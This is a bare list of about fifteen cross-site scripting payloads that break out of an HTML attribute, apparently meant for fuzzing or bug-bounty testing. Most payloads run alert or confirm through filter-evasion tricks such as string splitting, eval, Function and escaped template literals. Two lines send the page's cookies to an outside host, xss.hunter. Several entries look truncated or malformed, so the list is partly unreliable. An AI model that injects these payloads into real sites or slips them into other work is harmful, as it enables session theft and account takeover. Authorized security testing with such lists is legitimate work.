"><svg/onload=confirm(1)>
"><iframe src=javascript:alert(1)>
"><img src=x onerror=top>
"><script>self['al'+'ert']?.(1)</script>
"><script>Function("ale"+"rt(1)")()</script>
"><script>eval('ale'+'rt(1)')</script>
"><script>setTimeout`al\ert\x281\x29`</script>
"><script>top</script>
"><script>location=`javascr`+`ipt:alert(1)`</script>
"><script>document.write('<img src=x onerror=alert(1)>')</script>
"><script>new Image().src='https://xss.hunter/?q='+document.cookie</script>
"><script>fetch('https://xss.hunter/?q='+document.cookie)</script>
"><script>window.onerror=alert;throw 'XSS'</script>
"><script>let a='alert';window</script>
"><script>top</script>
